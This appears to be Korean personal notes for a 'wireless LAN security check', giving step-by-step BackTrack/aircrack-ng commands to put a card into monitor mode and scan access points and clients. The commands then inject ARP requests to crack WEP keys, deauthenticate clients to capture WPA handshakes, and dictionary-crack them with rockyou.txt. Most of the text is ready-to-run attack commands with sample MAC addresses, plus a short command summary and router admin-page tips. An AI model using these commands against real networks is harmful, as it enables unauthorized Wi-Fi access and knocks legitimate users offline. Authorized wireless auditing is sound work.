무선랜 보안점검

1. 백트랙에서 설정

백트랙이 설치된 vmware에서 device connect에서 airpcap을 인식하도록 한다.

# iwconfig

-> wlan0 확인

 

2. 모니터링용 랜카드(mon0)을 생성

# airmon-ng start wlan0

# iwconfig

-> mon0이 생성되었는지 확인

 

3. mon0을 통해 접속 가능한 AP 목록 확인

# airodump mon0

결과화면)

<맥IP> <> <> <> <> <채널> <WAP/WEP> ...

 

4. victim AP를 스캐닝하여 연결되어 있는 host의 MAC 정보 획득

접속되어 있는 host의 정보를 확인(STATION이 host의 MAC정보를 의미)

# airodump-ng –c <채널> --bssid <AP의 MAC> -w <저장할 파일명> mon0

예시)

# airodump-ng –c 9 —bssid 02:27:1C:AA:BB:B1 –w weppacket.cap mon0

 

5-1. WEP 크랙

1. WEP 크랙을 하기위해 많은 IVs를 수집

- host와 AP간에 발생하는 트래픽이 많지 않기 때문에 arp request packet injection을 통해 단시간에 트래픽을 수집

- 트래픽이 발생되는 동안 계속해서 airodump-ng로 트래픽을 수집

# aireplay-ng -3 -b <AP MAC> -h <host MAC> mon0

-> -3 은 arp request injection mode를 의미함

예시)

# aireplay-ng –3 -b 00:26:66:D7:87:0C –h 9C:E6:E7:C9:30:7E mon0

 

2. 수집한 iv를 재사용하여 key 추출

# aircrack-ng –z <iv를 저장한 dump파일명>

 

 

5-2. WAP 크랙

WAP는 deauth 옵션으로 host와 AP간에 연결된 세션을 끊어 재인증이 될 때 재인증되는 패킷을 캡쳐하여 크랙을 시도함

- 인증패킷을 캡쳐할 때까지 계속해서 airodump-ng로 트래픽을 수집

1. deauth 명령어

# aireplay-ng -0 -1 -a <AP의 MAC> -c <host의 MAC> mon0

예시)

# aireplay-ng -0 -1 -a 00:26:66:D7:87:0C -c 9C:E6:E7:C9:30:7E mon0

 

2. 패스워드 파일을 이용하여 크랙시도

- backtrack에 있는 패스워드 파일 위치 : 　/pentest/password/wordlist/rockyou.txt

# aircrack-ng <저장한 패킷파일> -w /pentest/passwords/wordlists/rockyou.txt

 

 

 

 

| 명령어 요약

 

1. WEP 크랙

AP에 호스트가 1개 이상 접속된 경우

# airmon-ng start wlan0

# airodump-ng mon0

# airodump-ng -c <채널번호> --bssid <AP MAC> -w <저장할 파일명.cap> mon0

새로 창을 띄워서

# aireplay-ng -3 -b <AP MAC> -h <host MAC> mon0

# aircrack-ng <저장한 파일명.cap>

 

 

참고사항

 

1. iptime에 파워만 연결된 상태에서 관리자페이지 접속 방법

- 암호방식이 WAP인 경우 AP에 랜케이블 연결없이도 무선랜으로 iptime에 접속하여 관리자 페이지 접근이 가능함

- 암호방식이 WEP인 경우 사내 보안정책으로 연결 불가

- PC를 AP의 랜포트와 랜선으로 직접 연결하고 PC의 네트워크 설정을 DHCP로 변경하여 iptime에 접속

- 핸드폰이나 다른 PC로 iptime에 접속(공유기에 인터넷케이블은 연결하지 않은 상태)

 

2. iptime 관리페이지의 IP를 모를 경우

- http://iptime.co.kr에서 iptime 검색기를 다운받아서 검색하면 쉽게 찾음

- wifi로 연결된 경우에는 default gateway 주소로 접속하면 관리자페이지에 접속 가능